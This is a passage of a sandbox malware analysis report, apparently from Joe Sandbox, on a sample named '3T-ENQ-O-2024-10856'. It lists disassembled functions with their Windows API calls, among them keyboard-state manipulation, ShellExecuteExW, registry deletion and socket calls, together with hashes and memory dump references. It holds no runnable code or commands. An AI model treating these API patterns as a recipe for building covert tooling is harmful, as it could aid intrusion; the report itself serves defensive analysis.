                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: BuffCharConnectRegistryUpper_memmove
                                • String ID:
                                • API String ID: 3479070676-0
                                • Opcode ID: 333f42bd63954a85bde9d0c55883a82768e892aff83cd78e3d31c1358f2e0b94
                                • Instruction ID: 4a0d58661f485358747c7ed8d5694ef764cbf6d909e6ff77416f512575cce3a5
                                • Opcode Fuzzy Hash: 333f42bd63954a85bde9d0c55883a82768e892aff83cd78e3d31c1358f2e0b94
                                • Instruction Fuzzy Hash: 06916831604201AFDB10EF54C891F6EB7E5FF88314F14881DF9969B2A2DB31EA45EB42
                                Function 00C8B72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __mtinitlocknum.LIBCMT ref: 00C8B744
                                  • Part of subcall function 00C88A0C: __FF_MSGBANNER.LIBCMT ref: 00C88A21
                                  • Part of subcall function 00C88A0C: __NMSG_WRITE.LIBCMT ref: 00C88A28
                                  • Part of subcall function 00C88A0C: __malloc_crt.LIBCMT ref: 00C88A48
                                • __lock.LIBCMT ref: 00C8B757
                                • __lock.LIBCMT ref: 00C8B7A3
                                • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00D16948,00000018,00C96C2B,?,00000000,00000109), ref: 00C8B7BF
                                • EnterCriticalSection.KERNEL32(8000000C,00D16948,00000018,00C96C2B,?,00000000,00000109), ref: 00C8B7DC
                                • LeaveCriticalSection.KERNEL32(8000000C), ref: 00C8B7EC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                • String ID:
                                • API String ID: 1422805418-0
                                • Opcode ID: c38bd870bc3aa9a07ea4dfe20be532d7991eeedf1325d07bb55b14d1647a97f5
                                • Instruction ID: 44d17212108fdfaf1c34d24450fd575f34ba7c7b1a5868f265398eeaafaeb231
                                • Opcode Fuzzy Hash: c38bd870bc3aa9a07ea4dfe20be532d7991eeedf1325d07bb55b14d1647a97f5
                                • Instruction Fuzzy Hash: 5A411771D007159BEB10BF68D8853ACBBA4BF5133DF248328E425AB2D2D7749D41CBA8
                                Function 00CAA1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                                Download Yara Rule
                                APIs
                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 00CAA1CE
                                  • Part of subcall function 00C8010A: std::exception::exception.LIBCMT ref: 00C8013E
                                  • Part of subcall function 00C8010A: __CxxThrowException@8.LIBCMT ref: 00C80153
                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00CAA205
                                • EnterCriticalSection.KERNEL32(?), ref: 00CAA221
                                • _memmove.LIBCMT ref: 00CAA26F
                                • _memmove.LIBCMT ref: 00CAA28C
                                • LeaveCriticalSection.KERNEL32(?), ref: 00CAA29B
                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00CAA2B0
                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CAA2CF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                • String ID:
                                • API String ID: 256516436-0
                                • Opcode ID: 621d1b90ca2d1bace3591812803c2ee9d5662dd2e3af568df0072e81726ceebf
                                • Instruction ID: 37575b86f4f2f46e4c86cda536bd427a77ba0622cea4b5818ae510d8732f7a10
                                • Opcode Fuzzy Hash: 621d1b90ca2d1bace3591812803c2ee9d5662dd2e3af568df0072e81726ceebf
                                • Instruction Fuzzy Hash: 82319E31900205ABDB00EFA4DC89AAEB7B8EF45324F1480A5E905AB256DB71DE15DBA1
                                Function 00CC8CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteObject.GDI32(00000000), ref: 00CC8CF3
                                • GetDC.USER32(00000000), ref: 00CC8CFB
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CC8D06
                                • ReleaseDC.USER32(00000000,00000000), ref: 00CC8D12
                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00CC8D4E
                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CC8D5F
                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CCBB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00CC8D99
                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CC8DB9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                • String ID:
                                • API String ID: 3864802216-0
                                • Opcode ID: bb766a7c0769e6634331648d036f35eed79c0f79ff20b76ca184c387d1c9238b
                                • Instruction ID: a260027f0edbad4b80b77fe704f329f9d49956bc35e1cd16bda113447b679e89
                                • Opcode Fuzzy Hash: bb766a7c0769e6634331648d036f35eed79c0f79ff20b76ca184c387d1c9238b
                                • Instruction Fuzzy Hash: 8F316B72200254BFEB108F50CC8AFEB3BADEF49755F084065FE0A9E191CAB59941CB70
                                Function 00CB1BFA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C684A6: __swprintf.LIBCMT ref: 00C684E5
                                  • Part of subcall function 00C684A6: __itow.LIBCMT ref: 00C68519
                                  • Part of subcall function 00C63BCF: _wcscpy.LIBCMT ref: 00C63BF2
                                • _wcstok.LIBCMT ref: 00CB1D6E
                                • _wcscpy.LIBCMT ref: 00CB1DFD
                                • _memset.LIBCMT ref: 00CB1E30
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                • String ID: X
                                • API String ID: 774024439-3081909835
                                • Opcode ID: e856eaaaf463c60cc198f3abf0e4e06cb4ce12637793009cef184191518c2cde
                                • Instruction ID: 7140121347e804b7b88df6f7cbeb59afa0d113cb4ddfa574f5e35e17e72550ad
                                • Opcode Fuzzy Hash: e856eaaaf463c60cc198f3abf0e4e06cb4ce12637793009cef184191518c2cde
                                • Instruction Fuzzy Hash: 8EC18C316083409FC724EF64C8D5AAAB7E4FF85310F44492DF89A972A2DB30ED45DB92
                                Function 00C7B40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f4847c749878e149dcea09fe1d2a71bcc878e8199d9dbb804fbaa3df3392023d
                                • Instruction ID: f35b9a5ea1ae59e72b1688911cb54e8cafa39d1d8866f3ce4eac99a1c41eab53
                                • Opcode Fuzzy Hash: f4847c749878e149dcea09fe1d2a71bcc878e8199d9dbb804fbaa3df3392023d
                                • Instruction Fuzzy Hash: 5C714A71900109EFCB15CF99CC89BAEBB74FF85314F14C159F92AAA251C734AE42DB64
                                Function 00CC2121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 00CC214B
                                • _memset.LIBCMT ref: 00CC2214
                                • ShellExecuteExW.SHELL32(?), ref: 00CC2259
                                  • Part of subcall function 00C684A6: __swprintf.LIBCMT ref: 00C684E5
                                  • Part of subcall function 00C684A6: __itow.LIBCMT ref: 00C68519
                                  • Part of subcall function 00C63BCF: _wcscpy.LIBCMT ref: 00C63BF2
                                • CloseHandle.KERNEL32(00000000), ref: 00CC2320
                                • FreeLibrary.KERNEL32(00000000), ref: 00CC232F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                • String ID: @
                                • API String ID: 4082843840-2766056989
                                • Opcode ID: 6f5e8d547e4df9593b184da5250bdc269d5f63b1c4ffb5d1b00950800578b1f3
                                • Instruction ID: 9049bf8e7362519ae2d8d1c49ef2a33d0dc8e8ea5d18000757e22673c7d558ff
                                • Opcode Fuzzy Hash: 6f5e8d547e4df9593b184da5250bdc269d5f63b1c4ffb5d1b00950800578b1f3
                                • Instruction Fuzzy Hash: A771AD70A00619DFCF14EFA8C891AAEB7F5FF48310F148059E856AB361DB34AE41DB90
                                Function 00CA47DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetParent.USER32(?), ref: 00CA481D
                                • GetKeyboardState.USER32(?), ref: 00CA4832
                                • SetKeyboardState.USER32(?), ref: 00CA4893
                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00CA48C1
                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 00CA48E0
                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00CA4926
                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00CA4949
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessagePost$KeyboardState$Parent
                                • String ID:
                                • API String ID: 87235514-0
                                • Opcode ID: 61861c8334706143268816bde02f3ccfdfe45fbb1c8a97b6c77abd08649a239a
                                • Instruction ID: db5a5c3e2d27f29d7e24589fabd4a4e06e5d599878a362f32cf3369c7207a3a8
                                • Opcode Fuzzy Hash: 61861c8334706143268816bde02f3ccfdfe45fbb1c8a97b6c77abd08649a239a
                                • Instruction Fuzzy Hash: 6351E6A05047D73DFB3A47348C45BBBBEAD5B87308F088589E1E5864C2C6D8EE94D751
                                Function 00CA45F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetParent.USER32(00000000), ref: 00CA4638
                                • GetKeyboardState.USER32(?), ref: 00CA464D
                                • SetKeyboardState.USER32(?), ref: 00CA46AE
                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00CA46DA
                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00CA46F7
                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00CA473B
                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00CA475C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessagePost$KeyboardState$Parent
                                • String ID:
                                • API String ID: 87235514-0
                                • Opcode ID: c23ca31646bf67cf4854811d50ddfab5b43ab76c4143ad4e42d50caaa7d11019
                                • Instruction ID: f81bd1ca4dcc5e5d40ac22c44ab2c51ed0827e81321eefba854cfb5803e045d4
                                • Opcode Fuzzy Hash: c23ca31646bf67cf4854811d50ddfab5b43ab76c4143ad4e42d50caaa7d11019
                                • Instruction Fuzzy Hash: BF51C8A05047D73DFB3A87248C45BB67F995B87308F084489F1E5868C2D7D4ED94E761
                                Function 00CA86AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcsncpy$LocalTime
                                • String ID:
                                • API String ID: 2945705084-0
                                • Opcode ID: 4bb15222518c69c805524432d3bab1ee5fb6e0b549bf9c89c8b6ce28e4865e38
                                • Instruction ID: acf174004ca9023d879d94c505db3e3412625ee4513ca26f438da505100d5118
                                • Opcode Fuzzy Hash: 4bb15222518c69c805524432d3bab1ee5fb6e0b549bf9c89c8b6ce28e4865e38
                                • Instruction Fuzzy Hash: 0E417E75C102147ACB10FBF4C88BACFB7ACAF05314F548866E964F3162FA34E25587A9
                                Function 00CB936F Relevance: 10.6, APIs: 7, Instructions: 136networkCOMMON
                                Download Yara Rule
                                APIs
                                • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00CFDBF0), ref: 00CB9409
                                • WSAGetLastError.WSOCK32(00000000), ref: 00CB9416
                                • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00CB943A
                                • #16.WSOCK32(?,?,00000000,00000000), ref: 00CB9452
                                • _strlen.LIBCMT ref: 00CB9484
                                • _memmove.LIBCMT ref: 00CB94CA
                                • WSAGetLastError.WSOCK32(00000000), ref: 00CB94F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ErrorLast$_memmove_strlenselect
                                • String ID:
                                • API String ID: 2795762555-0
                                • Opcode ID: 6f404efd90d3d41aedc24bcfbabf2f2e5a0ced07301de5156edc42bb8f4ead81
                                • Instruction ID: e906828ebd9d9e94ec005268f4aa7887098d220e94122eeb9f8a6c87401defae
                                • Opcode Fuzzy Hash: 6f404efd90d3d41aedc24bcfbabf2f2e5a0ced07301de5156edc42bb8f4ead81
                                • Instruction Fuzzy Hash: C1416075500205AFCB14EBA4CDD5FEEB7B9EF58314F208269F61697291DB30AE01DB60
                                Function 00CC9D97 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 00CC9DB0
                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CC9E57
                                • IsMenu.USER32(?), ref: 00CC9E6F
                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CC9EB7
                                • DrawMenuBar.USER32 ref: 00CC9ED0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Menu$Item$DrawInfoInsert_memset
                                • String ID: 0
                                • API String ID: 3866635326-4108050209
                                • Opcode ID: cc28a74b4ee527112fa8c3e43b11fe671152f2f0532afd6d7a28808825b54e0e
                                • Instruction ID: 05a66427216f5dac4ab10f7c3b81c1bae11cfd790197569df308877b75400bf4
                                • Opcode Fuzzy Hash: cc28a74b4ee527112fa8c3e43b11fe671152f2f0532afd6d7a28808825b54e0e
                                • Instruction Fuzzy Hash: 78411676A00249EFDB20DF50D888F9ABBB4FF15354F04806DE965AB260D730EE51DB60
                                Function 00CC3C63 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00CC3C92
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CC3CBC
                                • FreeLibrary.KERNEL32(00000000), ref: 00CC3D71
                                  • Part of subcall function 00CC3C63: RegCloseKey.ADVAPI32(?), ref: 00CC3CD9
                                  • Part of subcall function 00CC3C63: FreeLibrary.KERNEL32(?), ref: 00CC3D2B
                                  • Part of subcall function 00CC3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00CC3D4E
                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00CC3D16
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                • String ID:
                                • API String ID: 395352322-0
                                • Opcode ID: de473cc3763d979ec0738320642d425212e3e680ee5a0d368bb36c12ba1cba42
                                • Instruction ID: ef83bc123d562b24dc6889e195be55d4899a500142b78c6dcfb44da63e94f693
                                • Opcode Fuzzy Hash: de473cc3763d979ec0738320642d425212e3e680ee5a0d368bb36c12ba1cba42
                                • Instruction Fuzzy Hash: 98313AB1910249BFDB149B94EC89FFEB7BCEF08300F00456AE523E6151D6709F889B60
                                Function 00CC8DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CC8DF4
                                • GetWindowLongW.USER32(00DED170,000000F0), ref: 00CC8E27
                                • GetWindowLongW.USER32(00DED170,000000F0), ref: 00CC8E5C
                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00CC8E8E
                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00CC8EB8
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00CC8EC9
                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CC8EE3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: LongWindow$MessageSend
                                • String ID:
                                • API String ID: 2178440468-0
                                • Opcode ID: 97c947cabec0ea1225428e444b56ed90088fea1822bfe8ecb09f0e1d6cb77860
                                • Instruction ID: a00299dda7f347d0c505f416da93359a4c7d57dd91b3d40bc5a6113ec56f60ee
                                • Opcode Fuzzy Hash: 97c947cabec0ea1225428e444b56ed90088fea1822bfe8ecb09f0e1d6cb77860
                                • Instruction Fuzzy Hash: AA312039200254EFDB208F58DCC4F9A37A5FB6A314F1941ACF5268F2B2CB61AD499B50
                                Function 00CA16F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CA1734
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CA175A
                                • SysAllocString.OLEAUT32(00000000), ref: 00CA175D
                                • SysAllocString.OLEAUT32(?), ref: 00CA177B
                                • SysFreeString.OLEAUT32(?), ref: 00CA1784
                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00CA17A9
                                • SysAllocString.OLEAUT32(?), ref: 00CA17B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                • String ID:
                                • API String ID: 3761583154-0
                                • Opcode ID: c958720e75f24e476883da1912ad54539a80b597dcd327c6cfa6218f923b9c18
                                • Instruction ID: 6874bad859fd410280b4286456090abb6cc7f095764862672f929da9cf8cd03a
                                • Opcode Fuzzy Hash: c958720e75f24e476883da1912ad54539a80b597dcd327c6cfa6218f923b9c18
                                • Instruction Fuzzy Hash: 86219276604219AF9B10ABA8CC88DAF73ECEB0A374B448125FD16DF290DB70ED418760
                                Function 00CA69F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C631B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00C631DA
                                • lstrcmpiW.KERNEL32(?,?), ref: 00CA6A2B
